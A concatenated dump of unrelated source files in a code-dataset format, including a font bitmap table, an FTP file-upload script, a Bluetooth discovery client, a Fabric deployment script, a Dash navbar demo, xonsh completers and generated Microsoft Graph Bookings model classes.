0x21, 0x90, 0x68, 0x14, 0x0A, 0x05, 0x02, 0x83, 0x43, 0x7F, 0x00, 0xFF,
0x20, 0x90, 0x08, 0x87, 0xC2, 0x21, 0x00, 0x81, 0x40, 0xFF, 0xC0, 0xFF,
0xA0, 0x50, 0x08, 0x87, 0xC2, 0x21, 0x00, 0x80, 0x40, 0x78, 0x00, 0x1E,
0x98, 0x6C, 0x0A, 0x00, 0x80, 0x20, 0xF8, 0x0B, 0x02, 0x60, 0x87, 0xC0,
0xE3, 0xA0, 0x90, 0x48, 0x27, 0xF2, 0x09, 0x04, 0x82, 0x41, 0x71, 0xC0,
0xF9, 0x08, 0x42, 0x10, 0x84, 0x27, 0xC0, 0x1F, 0x02, 0x02, 0x02, 0x02,
0x02, 0x82, 0x82, 0xC6, 0x78, 0xE3, 0xA1, 0x11, 0x09, 0x05, 0x83, 0x21,
0x08, 0x84, 0x41, 0x70, 0xC0, 0xE0, 0x40, 0x40, 0x40, 0x40, 0x40, 0x41,
0x41, 0x41, 0xFF, 0xE0, 0xEC, 0x19, 0x45, 0x28, 0xA4, 0xA4, 0x94, 0x91,
0x12, 0x02, 0x40, 0x5C, 0x1C, 0xC3, 0xB0, 0x94, 0x4A, 0x24, 0x92, 0x49,
0x14, 0x8A, 0x43, 0x70, 0x80, 0x1E, 0x31, 0x90, 0x50, 0x18, 0x0C, 0x06,
0x02, 0x82, 0x63, 0x0F, 0x00, 0xFE, 0x43, 0x41, 0x41, 0x42, 0x7C, 0x40,
0x40, 0x40, 0xF0, 0x1C, 0x31, 0x90, 0x50, 0x18, 0x0C, 0x06, 0x02, 0x82,
0x63, 0x1F, 0x04, 0x07, 0x92, 0x30, 0xFE, 0x21, 0x90, 0x48, 0x24, 0x23,
0xE1, 0x10, 0x84, 0x41, 0x70, 0xC0, 0x3A, 0xCD, 0x0A, 0x03, 0x01, 0x80,
0xC1, 0xC7, 0x78, 0xFF, 0xC4, 0x62, 0x21, 0x00, 0x80, 0x40, 0x20, 0x10,
0x08, 0x1F, 0x00, 0xE3, 0xA0, 0x90, 0x48, 0x24, 0x12, 0x09, 0x04, 0x82,
0x22, 0x0E, 0x00, 0xF1, 0xE8, 0x10, 0x82, 0x10, 0x42, 0x10, 0x22, 0x04,
0x80, 0x50, 0x0C, 0x00, 0x80, 0xF1, 0xE8, 0x09, 0x11, 0x25, 0x44, 0xA8,
0x55, 0x0C, 0xA1, 0x8C, 0x31, 0x84, 0x30, 0xE3, 0xA0, 0x88, 0x82, 0x80,
0x80, 0xC0, 0x90, 0x44, 0x41, 0x71, 0xC0, 0xE3, 0xA0, 0x88, 0x82, 0x81,
0x40, 0x40, 0x20, 0x10, 0x08, 0x1F, 0x00, 0xFD, 0x0A, 0x20, 0x81, 0x04,
0x10, 0x21, 0x83, 0xFC, 0xEA, 0xAA, 0xAA, 0xC0, 0x80, 0x81, 0x03, 0x02,
0x04, 0x04, 0x08, 0x08, 0x10, 0x10, 0x20, 0x20, 0xD5, 0x55, 0x55, 0xC0,
0x10, 0x51, 0x22, 0x28, 0x20, 0xFF, 0xE0, 0x88, 0x80, 0x7E, 0x00, 0x80,
0x47, 0xEC, 0x14, 0x0A, 0x0C, 0xFB, 0xC0, 0x20, 0x10, 0x0B, 0xC6, 0x12,
0x05, 0x02, 0x81, 0x40, 0xB0, 0xB7, 0x80, 0x3A, 0x8E, 0x0C, 0x08, 0x10,
0x10, 0x9E, 0x03, 0x00, 0x80, 0x47, 0xA4, 0x34, 0x0A, 0x05, 0x02, 0x81,
0x21, 0x8F, 0x60, 0x3C, 0x43, 0x81, 0xFF, 0x80, 0x80, 0x61, 0x3E, 0x3D,
0x04, 0x3E, 0x41, 0x04, 0x10, 0x41, 0x0F, 0x80, 0x3D, 0xA1, 0xA0, 0x50,
0x28, 0x14, 0x09, 0x0C, 0x7A, 0x01, 0x01, 0x87, 0x80, 0xC0, 0x20, 0x10,
0x0B, 0xC6, 0x32, 0x09, 0x04, 0x82, 0x41, 0x20, 0xB8, 0xE0, 0x10, 0x01,
0xC0, 0x81, 0x02, 0x04, 0x08, 0x11, 0xFC, 0x10, 0x3E, 0x10, 0x84, 0x21,
0x08, 0x42, 0x3F, 0x00, 0xC0, 0x40, 0x40, 0x4F, 0x44, 0x58, 0x70, 0x48,
0x44, 0x42, 0xC7, 0x70, 0x20, 0x40, 0x81, 0x02, 0x04, 0x08, 0x10, 0x23,
0xF8, 0xB7, 0x64, 0x62, 0x31, 0x18, 0x8C, 0x46, 0x23, 0x91, 0x5E, 0x31,
0x90, 0x48, 0x24, 0x12, 0x09, 0x05, 0xC7, 0x3E, 0x31, 0xA0, 0x30, 0x18,
0x0C, 0x05, 0x8C, 0x7C, 0xDE, 0x30, 0x90, 0x28, 0x14, 0x0A, 0x05, 0x84,
0xBC, 0x40, 0x20, 0x38, 0x00, 0x3D, 0xA1, 0xA0, 0x50, 0x28, 0x14, 0x09,
0x0C, 0x7A, 0x01, 0x00, 0x80, 0xE0, 0xCE, 0xA1, 0x82, 0x04, 0x08, 0x10,
0x7C, 0x3A, 0x8D, 0x0B, 0x80, 0xF0, 0x70, 0xDE, 0x40, 0x40, 0xFC, 0x40,
0x40, 0x40, 0x40, 0x40, 0x41, 0x3E, 0xC3, 0x41, 0x41, 0x41, 0x41, 0x41,
0x43, 0x3D, 0xE3, 0xA0, 0x90, 0x84, 0x42, 0x20, 0xA0, 0x50, 0x10, 0xE3,
0xC0, 0x92, 0x4B, 0x25, 0x92, 0xA9, 0x98, 0x44, 0xE3, 0x31, 0x05, 0x01,
0x01, 0x41, 0x11, 0x05, 0xC7, 0xE3, 0xA0, 0x90, 0x84, 0x42, 0x40, 0xA0,
0x60, 0x10, 0x10, 0x08, 0x3E, 0x00, 0xFD, 0x08, 0x20, 0x82, 0x08, 0x10,
0xBF, 0x29, 0x24, 0xA2, 0x49, 0x26, 0xFF, 0xF8, 0x89, 0x24, 0x8A, 0x49,
0x2C, 0x61, 0x24, 0x30 ]
FreeMono9pt7bGlyphs = [
[ 0, 0, 0, 11, 0, 1 ], # 0x20 ' '
[ 0, 2, 11, 11, 4, -10 ], # 0x21 '!'
[ 3, 6, 5, 11, 2, -10 ], # 0x22 '"'
[ 7, 7, 12, 11, 2, -10 ], # 0x23 '#'
[ 18, 8, 12, 11, 1, -10 ], # 0x24 '$'
[ 30, 7, 11, 11, 2, -10 ], # 0x25 '%'
[ 40, 7, 10, 11, 2, -9 ], # 0x26 '&'
[ 49, 3, 5, 11, 4, -10 ], # 0x27 '''
[ 51, 2, 13, 11, 5, -10 ], # 0x28 '('
[ 55, 2, 13, 11, 4, -10 ], # 0x29 ')'
[ 59, 7, 7, 11, 2, -10 ], # 0x2A '#'
[ 66, 7, 7, 11, 2, -8 ], # 0x2B '+'
[ 73, 3, 5, 11, 2, -1 ], # 0x2C ','
[ 75, 9, 1, 11, 1, -5 ], # 0x2D '-'
[ 77, 2, 2, 11, 4, -1 ], # 0x2E '.'
[ 78, 7, 13, 11, 2, -11 ], # 0x2F '/'
[ 90, 7, 11, 11, 2, -10 ], # 0x30 '0'
[ 100, 5, 11, 11, 3, -10 ], # 0x31 '1'
[ 107, 7, 11, 11, 2, -10 ], # 0x32 '2'
[ 117, 8, 11, 11, 1, -10 ], # 0x33 '3'
[ 128, 6, 11, 11, 3, -10 ], # 0x34 '4'
[ 137, 7, 11, 11, 2, -10 ], # 0x35 '5'
[ 147, 7, 11, 11, 2, -10 ], # 0x36 '6'
[ 157, 7, 11, 11, 2, -10 ], # 0x37 '7'
[ 167, 7, 11, 11, 2, -10 ], # 0x38 '8'
[ 177, 7, 11, 11, 2, -10 ], # 0x39 '9'
[ 187, 2, 8, 11, 4, -7 ], # 0x3A ':'
[ 189, 3, 11, 11, 3, -7 ], # 0x3B ''
[ 194, 8, 8, 11, 1, -8 ], # 0x3C '<'
[ 202, 9, 4, 11, 1, -6 ], # 0x3D '='
[ 207, 9, 8, 11, 1, -8 ], # 0x3E '>'
[ 216, 7, 10, 11, 2, -9 ], # 0x3F '?'
[ 225, 8, 12, 11, 2, -10 ], # 0x40 '@'
[ 237, 11, 10, 11, 0, -9 ], # 0x41 'A'
[ 251, 9, 10, 11, 1, -9 ], # 0x42 'B'
[ 263, 9, 10, 11, 1, -9 ], # 0x43 'C'
[ 275, 9, 10, 11, 1, -9 ], # 0x44 'D'
[ 287, 9, 10, 11, 1, -9 ], # 0x45 'E'
[ 299, 9, 10, 11, 1, -9 ], # 0x46 'F'
[ 311, 10, 10, 11, 1, -9 ], # 0x47 'G'
[ 324, 9, 10, 11, 1, -9 ], # 0x48 'H'
[ 336, 5, 10, 11, 3, -9 ], # 0x49 'I'
[ 343, 8, 10, 11, 2, -9 ], # 0x4A 'J'
[ 353, 9, 10, 11, 1, -9 ], # 0x4B 'K'
[ 365, 8, 10, 11, 2, -9 ], # 0x4C 'L'
[ 375, 11, 10, 11, 0, -9 ], # 0x4D 'M'
[ 389, 9, 10, 11, 1, -9 ], # 0x4E 'N'
[ 401, 9, 10, 11, 1, -9 ], # 0x4F 'O'
[ 413, 8, 10, 11, 1, -9 ], # 0x50 'P'
[ 423, 9, 13, 11, 1, -9 ], # 0x51 'Q'
[ 438, 9, 10, 11, 1, -9 ], # 0x52 'R'
[ 450, 7, 10, 11, 2, -9 ], # 0x53 'S'
[ 459, 9, 10, 11, 1, -9 ], # 0x54 'T'
[ 471, 9, 10, 11, 1, -9 ], # 0x55 'U'
[ 483, 11, 10, 11, 0, -9 ], # 0x56 'V'
[ 497, 11, 10, 11, 0, -9 ], # 0x57 'W'
[ 511, 9, 10, 11, 1, -9 ], # 0x58 'X'
[ 523, 9, 10, 11, 1, -9 ], # 0x59 'Y'
[ 535, 7, 10, 11, 2, -9 ], # 0x5A 'Z'
[ 544, 2, 13, 11, 5, -10 ], # 0x5B '['
[ 548, 7, 13, 11, 2, -11 ], # 0x5C '\'
[ 560, 2, 13, 11, 4, -10 ], # 0x5D ']'
[ 564, 7, 5, 11, 2, -10 ], # 0x5E '^'
[ 569, 11, 1, 11, 0, 2 ], # 0x5F '_'
[ 571, 3, 3, 11, 3, -11 ], # 0x60 '`'
[ 573, 9, 8, 11, 1, -7 ], # 0x61 'a'
[ 582, 9, 11, 11, 1, -10 ], # 0x62 'b'
[ 595, 7, 8, 11, 2, -7 ], # 0x63 'c'
[ 602, 9, 11, 11, 1, -10 ], # 0x64 'd'
[ 615, 8, 8, 11, 1, -7 ], # 0x65 'e'
[ 623, 6, 11, 11, 3, -10 ], # 0x66 'f'
[ 632, 9, 11, 11, 1, -7 ], # 0x67 'g'
[ 645, 9, 11, 11, 1, -10 ], # 0x68 'h'
[ 658, 7, 10, 11, 2, -9 ], # 0x69 'i'
[ 667, 5, 13, 11, 3, -9 ], # 0x6A 'j'
[ 676, 8, 11, 11, 2, -10 ], # 0x6B 'k'
[ 687, 7, 11, 11, 2, -10 ], # 0x6C 'l'
[ 697, 9, 8, 11, 1, -7 ], # 0x6D 'm'
[ 706, 9, 8, 11, 1, -7 ], # 0x6E 'n'
[ 715, 9, 8, 11, 1, -7 ], # 0x6F 'o'
[ 724, 9, 11, 11, 1, -7 ], # 0x70 'p'
[ 737, 9, 11, 11, 1, -7 ], # 0x71 'q'
[ 750, 7, 8, 11, 3, -7 ], # 0x72 'r'
[ 757, 7, 8, 11, 2, -7 ], # 0x73 's'
[ 764, 8, 10, 11, 2, -9 ], # 0x74 't'
[ 774, 8, 8, 11, 1, -7 ], # 0x75 'u'
[ 782, 9, 8, 11, 1, -7 ], # 0x76 'v'
[ 791, 9, 8, 11, 1, -7 ], # 0x77 'w'
[ 800, 9, 8, 11, 1, -7 ], # 0x78 'x'
[ 809, 9, 11, 11, 1, -7 ], # 0x79 'y'
[ 822, 7, 8, 11, 2, -7 ], # 0x7A 'z'
[ 829, 3, 13, 11, 4, -10 ], # 0x7B '['
[ 834, 1, 13, 11, 5, -10 ], # 0x7C '|'
[ 836, 3, 13, 11, 4, -10 ], # 0x7D ']'
[ 841, 7, 3, 11, 2, -6 ] ] # 0x7E '~'
FreeMono9pt7b = [
FreeMono9pt7bBitmaps,
FreeMono9pt7bGlyphs,
0x20, 0x7E, 18 ]
# Approx. 1516 bytes
| 1.101563 | 1 |
misc/vulnpwn/lib/core/exceptions.py | all3g/pieces | 34 | 12762186 | #!/usr/bin/python
# -*- coding: utf-8 -*-
##
# Current source: https://github.com/open-security/vulnpwn/
##
class FrameworkException(Exception):
pass
class OptionValidationError(FrameworkException):
pass
| 1.5 | 2 |
fileup.py | basnijholt/fileup | 0 | 12762187 | #!/usr/bin/env python
# -*-Python-*-
import argparse
import contextlib
import datetime
import ftplib
import os
import re
import subprocess
import tempfile
def get_valid_filename(s):
"""
Return the given string converted to a string that can be used for a clean
filename. Remove leading and trailing spaces; convert other spaces to
underscores; and remove anything that is not an alphanumeric, dash,
underscore, or dot.
>>> get_valid_filename("john's portrait in 2004.jpg")
'johns_portrait_in_2004.jpg'
"""
s = s.strip().replace(" ", "_")
return re.sub(r"(?u)[^-\w.]", "", s)
def read_config():
# Read the config
with open(os.path.expanduser("~/.config/fileup/config")) as f:
"""Create a config file at ~/.config/fileup/config with the
following information and structure:
example.com
file_up_folder
my_user_name
my_difficult_password
"""
base_url, base_folder, folder, user, pw = [
s.replace("\n", "") for s in f.readlines()
]
return base_url, base_folder, folder, user, pw
def remove_old_files(ftp, today):
# Remove all files that are past the limit
files = [f for f in ftp.nlst() if "_delete_on_" in f]
file_dates = [f.rsplit("_delete_on_", 1) for f in files]
for file_name, date in file_dates:
rm_date = datetime.datetime.strptime(date, "%Y-%m-%d").date()
if rm_date < today:
print(f'removing "{file_name}" because the date passed')
try:
ftp.delete(file_name)
except Exception:
# File didn't exist anymore for some reason...
pass
ftp.delete(file_name + "_delete_on_" + date)
def main():
# Get arguments
description = [
"Publish a file. \n \n",
"Create a config file at ~/.config/fileup/config with the following information and structure:\n",
"example.com",
"base_folder",
"file_up_folder",
"my_user_name",
"my_difficult_password",
]
parser = argparse.ArgumentParser(
description="\n".join(description),
formatter_class=argparse.RawTextHelpFormatter,
)
parser.add_argument("fname", type=str)
parser.add_argument(
"-t",
"--time",
type=int,
default=90,
help="If time is 0 the file will never be deleted, default is 90 days.",
)
parser.add_argument("-d", "--direct", action="store_true")
parser.add_argument("-i", "--img", action="store_true")
args = parser.parse_args()
fname = os.path.abspath(os.path.expanduser(args.fname))
fname_base = os.path.basename(fname)
base_url, base_folder, folder, user, pw = read_config()
# Connect to server
ftp = ftplib.FTP(base_url, user, pw)
ftp.cwd(os.path.join(base_folder, folder))
# Fix the filename to avoid filename character issues
fname_base = get_valid_filename(fname_base)
today = datetime.datetime.now().date()
remove_old_files(ftp, today)
# Delete first if file already exists, it could happen that there is
# already a file with a specified deletion date, these should be removed.
for f in ftp.nlst():
if f.startswith(fname_base) and "_delete_on_" in f:
ftp.delete(f)
if args.time != 0: # could be negative (used for debugging).
remove_on = today + datetime.timedelta(days=args.time)
fname_date = fname_base + "_delete_on_" + str(remove_on)
with tempfile.TemporaryFile() as f:
print("upload " + fname_date)
ftp.storbinary(f"STOR {fname_date}", f)
# Upload and open the actual file
with open(fname, "rb") as f:
ftp.storbinary(f"STOR {fname_base}", f)
print("upload " + fname_base)
ftp.quit()
# Create URL
if folder:
url = f"{base_url}/{folder}/{fname_base}"
else:
url = f"{base_url}/{fname_base}"
if args.direct:
# Returns the url as is.
url = "http://" + url
elif args.img:
url = f""
elif fname.endswith(".ipynb"):
# Return the url in the nbviewer
url = "http://nbviewer.jupyter.org/url/" + url + "?flush_cache=true"
else:
url = "http://" + url
# Put a URL into clipboard only works on OS X
with contextlib.suppress(Exception):
process = subprocess.Popen(
"pbcopy", env={"LANG": "en_US.UTF-8"}, stdin=subprocess.PIPE
)
process.communicate(url.encode("utf-8"))
print("Your url is: ", url)
if __name__ == "__main__":
main()
| 3.296875 | 3 |
redact/tools/utils.py | brighter-ai/ips-client | 1 | 12762188 | import glob
from pathlib import Path
from typing import List, Union
ARCHIVE_EXTENSIONS = ['tar']
IMG_EXTENSIONS = ['jpeg', 'jpg', 'bmp', 'png']
VID_EXTENSIONS = ['mp4', 'avi', 'mov', 'mkv', 'mts', 'ts', 'webm']
def normalize_path(path: Union[str, Path]) -> Path:
return Path(path).expanduser().resolve()
def file_extension(path: str) -> str:
"""
Extracts canonical file extension from path (no leading dot and all lowercase)
e.g. mp4, avi, jpeg, ts
"""
return Path(path).suffix[1:].lower()
def files_in_dir(dir: Path, recursive=True, sort=False) -> List[str]:
"""
Iterates recursively through all files in all subfolders.
"""
path = Path(dir)
if recursive:
search_path = str(path.joinpath('**'))
file_list = glob.glob(search_path, recursive=True)
else:
search_path = str(path.joinpath('*'))
file_list = glob.glob(search_path, recursive=False)
file_list = [f for f in file_list if Path(f).is_file()]
if sort:
file_list.sort()
return file_list
def is_archive(file_path: str) -> bool:
"""
Determine of a given file is an archive (according to its extension).
"""
file_ext = file_extension(file_path)
return file_ext in ARCHIVE_EXTENSIONS
def is_image(file_path: str) -> bool:
"""
Determine of a given file is an image (according to its extension).
"""
file_ext = file_extension(file_path)
return file_ext in IMG_EXTENSIONS
def is_video(file_path: str) -> bool:
"""
Determine of a given file is an video (according to its extension).
"""
file_ext = file_extension(file_path)
return file_ext in VID_EXTENSIONS
def archives_in_dir(dir: Path, recursive=True, sort=False):
"""
Iterates recursively over all archives in all subfolders.
"""
file_list = files_in_dir(dir=dir, recursive=recursive, sort=sort)
for file in file_list:
if is_archive(file):
yield file
def images_in_dir(dir: Path, recursive=True, sort=False):
"""
Iterates recursively over all images in all subfolders.
"""
file_list = files_in_dir(dir=dir, recursive=recursive, sort=sort)
for file in file_list:
if is_image(file):
yield file
def videos_in_dir(dir: Path, recursive=True, sort=False):
"""
Iterates recursively over all videos in all subfolders.
"""
file_list = files_in_dir(dir=dir, recursive=recursive, sort=sort)
for file in file_list:
if is_video(file):
yield file
| 3.109375 | 3 |
exercicios/PythonExercicios/ex085.py | Roberto-Sartore/Python | 0 | 12762189 | num = [[], []]
valor = 0
for C in range (1, 8):
valor = int(input(f'Digite o {C}º. valor: '))
if valor % 2 == 0:
num[0].append(valor)
else:
num[1].append(valor)
print('=' * 48)
num[0].sort()
num[1].sort()
print(f'Os Valores pares digitados foram: {num[0]}')
print(f'Os Valores impares digitados foram: {num[1]}')
| 3.765625 | 4 |
client.py | lahiiru/BLE | 3 | 12762190 | from bluetooth import *
from time import sleep
import re, uuid
devices = set()
devices_to_update = set()
dev_mac = ':'.join(re.findall('..', '%012x' % uuid.getnode())).upper()
print(dev_mac)
def enable_ble():
print('enabling bluetooth')
try:
os.system('sudo systemctl start bluetooth.service && sudo hciconfig hci0 up')
except Exception as e:
print(e)
def job():
print("\n\nPerforming inquiry...")
new_devices = set()
global devices_to_update
services = find_service(name="helloService")
print(services)
for i in range(len(services)):
match = services[i]
if match["name"] == "helloService":
port = match["port"]
name = match["name"]
host = match["host"]
print(name, port, host)
new_devices.add(host)
devices_diff_set = devices.symmetric_difference(new_devices)
print("Diff set = %s"%devices_diff_set)
devices_modified = False
if len(devices_diff_set) > 0:
for addr in devices_diff_set:
if addr in new_devices:
devices.add(addr)
devices_to_update.add(addr)
devices_modified = True
else:
print("Removing device %s" % addr)
devices.remove(addr)
if addr in devices_to_update:
devices_to_update.remove(addr)
devices_modified = True
if devices_modified: # need to notify to all devices
devices_to_update = devices_to_update.union(devices)
if len(devices_to_update) > 0:
update_message = "%sEOD" % devices
print("Update message = %s" % update_message)
for addr in devices_to_update.copy():
try:
print("Connecting to %s to send updated list" % addr)
client_socket = BluetoothSocket(RFCOMM)
client_socket.connect((addr, 1))
client_socket.send(update_message)
print("Sent to %s" % addr)
client_socket.close()
devices_to_update.remove(addr)
except Exception as e:
print(e)
else:
print("No updates to send")
enable_ble()
while True:
job()
sleep(5)
| 2.8125 | 3 |
fabfile/__init__.py | nprapps/elections16-general | 2 | 12762191 | <reponame>nprapps/elections16-general<filename>fabfile/__init__.py<gh_stars>1-10
#!/usr/bin/env python
from datetime import datetime
import json
import os
from boto.s3.key import Key
from fabric.api import local, require, settings, task
from fabric.state import env
from termcolor import colored
import app_config
# Other fabfiles
from . import daemons
from . import data
from . import issues
from . import render
from . import text
from . import utils
if app_config.DEPLOY_TO_SERVERS:
from . import servers
# Bootstrap can only be run once, then it's disabled
if app_config.PROJECT_SLUG == '$NEW_PROJECT_SLUG':
from . import bootstrap
"""
Base configuration
"""
env.user = app_config.SERVER_USER
env.forward_agent = True
env.hosts = []
"""
Environments
Changing environment requires a full-stack test.
An environment points to both a server and an S3
bucket.
"""
@task
def production():
"""
Run as though on production.
"""
env.settings = 'production'
app_config.configure_targets(env.settings)
env.hosts = app_config.SERVERS
@task
def staging():
"""
Run as though on staging.
"""
env.settings = 'staging'
app_config.configure_targets(env.settings)
env.hosts = app_config.SERVERS
"""
Branches
Changing branches requires deploying that branch to a host.
"""
@task
def stable():
"""
Work on stable branch.
"""
env.branch = 'stable'
@task
def master():
"""
Work on development branch.
"""
env.branch = 'master'
@task
def branch(branch_name):
"""
Work on any specified branch.
"""
env.branch = branch_name
"""
Running the app
"""
@task
def app(port='8000'):
"""
Serve app.py.
"""
if env.get('settings'):
local("DEPLOYMENT_TARGET=%s bash -c 'gunicorn -b 0.0.0.0:%s --timeout 3600 --debug --reload --log-file=logs/app.log app:wsgi_app'" % (env.settings, port))
else:
local('gunicorn -b 0.0.0.0:%s --timeout 3600 --debug --reload --log-file=- app:wsgi_app' % port)
@task
def tests():
"""
Run Python unit tests.
"""
local('nosetests')
"""
Deployment
Changes to deployment requires a full-stack test. Deployment
has two primary functions: Pushing flat files to S3 and deploying
code to a remote server if required.
"""
@task
def deploy_national_data():
local('rm -rf {0}'.format(app_config.DATA_OUTPUT_FOLDER))
local('mkdir {0}'.format(app_config.DATA_OUTPUT_FOLDER))
render.render_all_national()
deploy_data_folder()
@task
def deploy_presidential_data():
local('rm -rf {0}'.format(app_config.DATA_OUTPUT_FOLDER))
local('mkdir {0}'.format(app_config.DATA_OUTPUT_FOLDER))
render.render_presidential_files()
deploy_data_folder()
@task
def deploy_all_data():
local('rm -rf {0}'.format(app_config.DATA_OUTPUT_FOLDER))
local('mkdir {0}'.format(app_config.DATA_OUTPUT_FOLDER))
render.render_all()
deploy_data_folder()
@task
def deploy_data_folder():
local('aws s3 cp {0}/top-level-results.json s3://{1}/{2}/data/ --acl public-read --cache-control max-age=5'.format(app_config.DATA_OUTPUT_FOLDER, app_config.S3_BUCKET, app_config.PROJECT_SLUG))
local('aws s3 sync {0} s3://{1}/{2}/data/ --acl public-read --cache-control max-age=5'.format(app_config.DATA_OUTPUT_FOLDER, app_config.S3_BUCKET, app_config.PROJECT_SLUG))
"""
Destruction
Changes to destruction require setup/deploy to a test host in order to test.
Destruction should remove all files related to the project from both a remote
host and S3.
"""
@task
def shiva_the_destroyer():
"""
Deletes the app from s3
"""
require('settings', provided_by=[production, staging])
utils.confirm(
colored("You are about to destroy everything deployed to %s for this project.\nDo you know what you're doing?')" % app_config.DEPLOYMENT_TARGET, "red")
)
with settings(warn_only=True):
flat.delete_folder(app_config.S3_BUCKET, app_config.PROJECT_SLUG)
if app_config.DEPLOY_TO_SERVERS:
servers.delete_project()
if app_config.DEPLOY_CRONTAB:
servers.uninstall_crontab()
if app_config.DEPLOY_SERVICES:
servers.nuke_confs()
| 1.945313 | 2 |
examples/navitem_test.py | zmoxq/dash-bootstrap-components | 1 | 12762192 | <reponame>zmoxq/dash-bootstrap-components
import dash
import dash_bootstrap_components as dbc
import dash_html_components as html
from dash.dependencies import Input, Output
app = dash.Dash()
navbar = dbc.Navbar(
brand="Dash Bootstrap components",
brand_href="https://github.com/ASIDataScience/dash-bootstrap-components",
sticky="top",
children=[
dbc.NavItem(dbc.NavLink("ASI", href="https://www.asidatascience.com")),
dbc.DropdownMenu(
nav=True,
in_navbar=True,
label="Menu",
children=[
dbc.DropdownMenuItem("Entry 1", href="https://google.com"),
dbc.DropdownMenuItem(
"Entry 2", href="/test", id="dd-internal"
),
dbc.DropdownMenuItem(divider=True),
dbc.DropdownMenuItem("A heading", header=True),
dbc.DropdownMenuItem(
"Entry 3", href="/external-test", external_link=True
),
dbc.DropdownMenuItem("Entry 4 - does nothing", id="dd-button"),
],
),
],
)
app.layout = html.Div(
[navbar, html.Div(id="counter"), html.Div(id="counter2")]
)
@app.callback(Output("counter", "children"), [Input("dd-button", "n_clicks")])
def count(n):
return str(n)
@app.callback(
Output("counter2", "children"), [Input("dd-internal", "n_clicks")]
)
def count2(n):
return str(n)
if __name__ == "__main__":
app.run_server(port=8888)
| 2.46875 | 2 |
xonsh/completers/xompletions.py | caputomarcos/xonsh | 0 | 12762193 | <filename>xonsh/completers/xompletions.py
"""Provides completions for xonsh internal utilities"""
import xonsh.xontribs as xx
import xonsh.tools as xt
def complete_xonfig(prefix, line, start, end, ctx):
"""Completion for ``xonfig``"""
args = line.split(' ')
if len(args) == 0 or args[0] != 'xonfig':
return None
curix = args.index(prefix)
if curix == 1:
possible = {'info', 'wizard', 'styles', 'colors', '-h'}
elif curix == 2 and args[1] == 'colors':
possible = set(xt.color_style_names())
else:
raise StopIteration
return {i for i in possible if i.startswith(prefix)}
def _list_installed_xontribs():
meta = xx.xontrib_metadata()
installed = []
for md in meta['xontribs']:
name = md['name']
spec = xx.find_xontrib(name)
if spec is not None:
installed.append(spec.name.rsplit('.')[-1])
return installed
def complete_xontrib(prefix, line, start, end, ctx):
"""Completion for ``xontrib``"""
args = line.split(' ')
if len(args) == 0 or args[0] != 'xontrib':
return None
curix = args.index(prefix)
if curix == 1:
possible = {'list', 'load'}
elif curix == 2:
if args[1] == 'load':
possible = _list_installed_xontribs()
else:
raise StopIteration
return {i for i in possible if i.startswith(prefix)}
| 2.453125 | 2 |
msgraph-cli-extensions/beta/bookings_beta/azext_bookings_beta/vendored_sdks/bookings/models/_models_py3.py | thewahome/msgraph-cli | 0 | 12762194 | <gh_stars>0
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
import datetime
from typing import Dict, List, Optional, Union
from azure.core.exceptions import HttpResponseError
import msrest.serialization
from ._bookings_enums import *
class CollectionOfBookingAppointment(msrest.serialization.Model):
"""Collection of bookingAppointment.
:param additional_properties: Unmatched properties from the message are deserialized to this
collection.
:type additional_properties: dict[str, object]
:param value:
:type value: list[~bookings.models.MicrosoftGraphBookingAppointment]
:param odata_next_link:
:type odata_next_link: str
"""
_attribute_map = {
'additional_properties': {'key': '', 'type': '{object}'},
'value': {'key': 'value', 'type': '[MicrosoftGraphBookingAppointment]'},
'odata_next_link': {'key': '@odata\\.nextLink', 'type': 'str'},
}
def __init__(
self,
*,
additional_properties: Optional[Dict[str, object]] = None,
value: Optional[List["MicrosoftGraphBookingAppointment"]] = None,
odata_next_link: Optional[str] = None,
**kwargs
):
super(CollectionOfBookingAppointment, self).__init__(**kwargs)
self.additional_properties = additional_properties
self.value = value
self.odata_next_link = odata_next_link
class CollectionOfBookingAppointment0(msrest.serialization.Model):
"""Collection of bookingAppointment.
:param additional_properties: Unmatched properties from the message are deserialized to this
collection.
:type additional_properties: dict[str, object]
:param value:
:type value: list[~bookings.models.MicrosoftGraphBookingAppointment]
:param odata_next_link:
:type odata_next_link: str
"""
_attribute_map = {
'additional_properties': {'key': '', 'type': '{object}'},
'value': {'key': 'value', 'type': '[MicrosoftGraphBookingAppointment]'},
'odata_next_link': {'key': '@odata\\.nextLink', 'type': 'str'},
}
def __init__(
self,
*,
additional_properties: Optional[Dict[str, object]] = None,
value: Optional[List["MicrosoftGraphBookingAppointment"]] = None,
odata_next_link: Optional[str] = None,
**kwargs
):
super(CollectionOfBookingAppointment0, self).__init__(**kwargs)
self.additional_properties = additional_properties
self.value = value
self.odata_next_link = odata_next_link
class CollectionOfBookingBusiness(msrest.serialization.Model):
"""Collection of bookingBusiness.
:param additional_properties: Unmatched properties from the message are deserialized to this
collection.
:type additional_properties: dict[str, object]
:param value:
:type value: list[~bookings.models.MicrosoftGraphBookingBusiness]
:param odata_next_link:
:type odata_next_link: str
"""
_attribute_map = {
'additional_properties': {'key': '', 'type': '{object}'},
'value': {'key': 'value', 'type': '[MicrosoftGraphBookingBusiness]'},
'odata_next_link': {'key': '@odata\\.nextLink', 'type': 'str'},
}
def __init__(
self,
*,
additional_properties: Optional[Dict[str, object]] = None,
value: Optional[List["MicrosoftGraphBookingBusiness"]] = None,
odata_next_link: Optional[str] = None,
**kwargs
):
super(CollectionOfBookingBusiness, self).__init__(**kwargs)
self.additional_properties = additional_properties
self.value = value
self.odata_next_link = odata_next_link
class CollectionOfBookingCurrency(msrest.serialization.Model):
"""Collection of bookingCurrency.
:param additional_properties: Unmatched properties from the message are deserialized to this
collection.
:type additional_properties: dict[str, object]
:param value:
:type value: list[~bookings.models.MicrosoftGraphBookingCurrency]
:param odata_next_link:
:type odata_next_link: str
"""
_attribute_map = {
'additional_properties': {'key': '', 'type': '{object}'},
'value': {'key': 'value', 'type': '[MicrosoftGraphBookingCurrency]'},
'odata_next_link': {'key': '@odata\\.nextLink', 'type': 'str'},
}
def __init__(
self,
*,
additional_properties: Optional[Dict[str, object]] = None,
value: Optional[List["MicrosoftGraphBookingCurrency"]] = None,
odata_next_link: Optional[str] = None,
**kwargs
):
super(CollectionOfBookingCurrency, self).__init__(**kwargs)
self.additional_properties = additional_properties
self.value = value
self.odata_next_link = odata_next_link
class CollectionOfBookingCustomer(msrest.serialization.Model):
